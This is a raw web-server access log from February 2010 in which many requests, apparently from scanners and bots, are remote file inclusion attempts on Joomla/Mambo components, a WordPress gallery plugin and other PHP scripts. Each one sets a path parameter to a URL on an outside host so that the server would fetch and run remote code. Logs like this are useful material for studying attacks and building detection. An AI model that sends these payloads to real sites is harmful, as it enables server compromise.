218.38.136.126 - - [08/Feb/2010:04:22:34 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:22:34 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:22:35 -0800] "GET /logs/access_091231.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:22:37 -0800] "GET /dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:22:38 -0800] "GET /logs/access_100118.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:22:43 -0800] "GET /logs/access_100118.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:22:48 -0800] "GET /logs/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:22:48 -0800] "GET /logs/access_100126.log%20%20/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:22:51 -0800] "GET /logs/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:22:51 -0800] "GET /logs/access_100126.log%20%20/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:22:51 -0800] "GET /dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:22:55 -0800] "GET /logs/access_100111.log%20%20/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:23:19 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:23:29 -0800] "GET /logs/access_100203.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:23:29 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:23:29 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:24:17 -0800] "GET /logs/access_100111.log%20%20/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:24:30 -0800] "GET /logs/access_100111.log%20%20/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:04:24:43 -0800] "GET /logs/access_100111.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:25:17 -0800] "GET /logs/access_100104.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:29:15 -0800] "GET /logs/access_100120.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:29:15 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:29:15 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [08/Feb/2010:04:30:16 -0800] "GET /logs/access_100206.log HTTP/1.0" 200 2163814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:30:26 -0800] "GET /logs/access_100120.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:30:26 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:30:27 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:31:04 -0800] "GET /logs/access_100125.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:31:04 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:31:04 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:31:04 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:31:04 -0800] "GET /logs/access_100125.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:31:04 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:31:07 -0800] "GET /logs/access_100118.log/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:31:07 -0800] "GET /logs/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:31:07 -0800] "GET /common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:31:24 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:31:24 -0800] "GET /logs/access_100120.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:31:24 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:31:28 -0800] "GET /logs/access_100105.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:32:04 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:32:04 -0800] "GET /logs/access_100120.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:32:04 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:32:39 -0800] "GET /logs/access_100119.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:32:39 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:32:39 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:33:00 -0800] "GET /logs/access_100105.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:33:04 -0800] "GET /logs/access_100113.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:33:15 -0800] "GET /logs/access_100113.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:04:36:17 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:04:36:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:04:36:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:36:56 -0800] "GET /logs/access_100112.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:36:56 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:36:56 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:36:58 -0800] "GET /logs/access_100112.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:36:58 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:36:58 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:37:02 -0800] "GET /logs/access_100201.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.160.180.146 - - [08/Feb/2010:04:37:08 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "puaga.com"
202.160.180.183 - - [08/Feb/2010:04:37:19 -0800] "GET /orange_g/forum/viewtopic.php?p=20307 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "puaga.com"
67.195.111.172 - - [08/Feb/2010:04:37:49 -0800] "GET /logs/access_100126.log HTTP/1.0" 200 1337654 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:37:54 -0800] "GET /logs/access_100201.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:37:54 -0800] "GET /logs/access.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:37:54 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:37:55 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:04:38:20 -0800] "GET /bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:38:25 -0800] "GET /logs/access_100125.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:38:47 -0800] "GET /logs/access_100125.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:38:53 -0800] "GET /logs/access_100112.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:38:53 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:38:53 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:39:15 -0800] "GET /logs/access_100113.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:39:36 -0800] "GET /logs/access_100113.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:04:40:19 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.60.28.10 - - [08/Feb/2010:04:42:22 -0800] "GET /www.waytochristmission.com/gbbs/bbs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
211.60.28.10 - - [08/Feb/2010:04:42:23 -0800] "GET /logs//www.waytochristmission.com/gbbs/bbs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:48:48 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:48:48 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:48:49 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:48:55 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:48:55 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:48:55 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:49:00 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:49:16 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:49:24 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:49:24 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:49:24 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:49:56 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:49:57 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:49:57 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:50:32 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:51:25 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:51:25 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:51:25 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.212.18.34 - - [08/Feb/2010:04:51:30 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
77.88.25.28 - - [08/Feb/2010:04:51:35 -0800] "GET /logs/access_091201.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
66.212.18.34 - - [08/Feb/2010:04:51:38 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:51:39 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:52:31 -0800] "GET /logs/access_100107.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:52:32 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:52:32 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
